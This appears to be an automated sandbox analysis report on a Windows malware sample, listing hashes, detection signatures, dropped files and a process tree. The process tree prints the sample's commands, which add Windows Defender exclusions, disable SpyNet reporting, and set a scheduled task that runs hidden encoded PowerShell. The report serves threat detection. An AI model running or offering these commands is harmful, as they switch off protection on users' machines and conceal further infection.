Analysis

  • max time kernel
    6s
  • max time network
    8s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    03/04/2024, 12:00

General

  • Target

    2e46e7307c971439115f6b451201477ac673e38db7757134888505d8713eff7d.exe

  • Size

    6.5MB

  • MD5

    5ac036db54785817a366510d11fe27ff

  • SHA1

    3ad032c1efe0bb3510af47af05fc6fe799f8ef2b

  • SHA256

    2e46e7307c971439115f6b451201477ac673e38db7757134888505d8713eff7d

  • SHA512

    eaa57362ddde75766a2f53dd4492722acdf4f5a2ff11db5ad88d0b2fe38ca7a51bc698d6cda283141ff86c5fa149b2ac6cd07adcadcb455773b41f006b7dbcd0

  • SSDEEP

    98304:91OopDcPHB7oWB0q32sghrEGog5UFI0eDyNGfJ9cnqzdmHQuuWy4rk0yaYWngUxV:91OoSKWBz3lgi+0fYLfsvry4A0y2gQHL

Score
7/10

Malware Config

Signatures

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e46e7307c971439115f6b451201477ac673e38db7757134888505d8713eff7d.exe
    "C:\Users\Admin\AppData\Local\Temp\2e46e7307c971439115f6b451201477ac673e38db7757134888505d8713eff7d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3316
    • C:\Users\Admin\AppData\Local\Temp\7zS395F.tmp\Install.exe
      .\Install.exe /MycdidinP "385118" /S
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:5108
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4620
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3016
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            5⤵
            PID:4336
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            5⤵
            PID:1616
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3212
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1800
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
            5⤵
            PID:1020
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
            5⤵
            PID:2216
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gYVWElPOE" /SC once /ST 08:46:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Creates scheduled task(s)
        PID:4172
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gYVWElPOE"
        3⤵
        PID:1652
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3060
    • C:\Windows\system32\gpupdate.exe
      "C:\Windows\system32\gpupdate.exe" /force
      2⤵
      PID:4900
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
    1⤵
    PID:4700
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
    1⤵
    PID:4012
  • C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam
    1⤵
    PID:3992

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7zS395F.tmp\Install.exe

    Filesize

    6.9MB

    MD5

    ea99e72c1ac89aa9cc14178b1c46d50d

    SHA1

    60b896781f40e89106d0c76abd11c5b5d0832943

    SHA256

    9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28

    SHA512

    03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bujs3buf.gp2.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3060-18-0x00007FFFA4A50000-0x00007FFFA5512000-memory.dmp

    Filesize

    10.8MB

  • memory/3060-19-0x000001827B380000-0x000001827B390000-memory.dmp

    Filesize

    64KB

  • memory/3060-20-0x000001827B380000-0x000001827B390000-memory.dmp

    Filesize

    64KB

  • memory/3060-29-0x000001827B490000-0x000001827B4B2000-memory.dmp

    Filesize

    136KB

  • memory/3060-32-0x00007FFFA4A50000-0x00007FFFA5512000-memory.dmp

    Filesize

    10.8MB

  • memory/5108-14-0x0000000010000000-0x00000000105E8000-memory.dmp

    Filesize

    5.9MB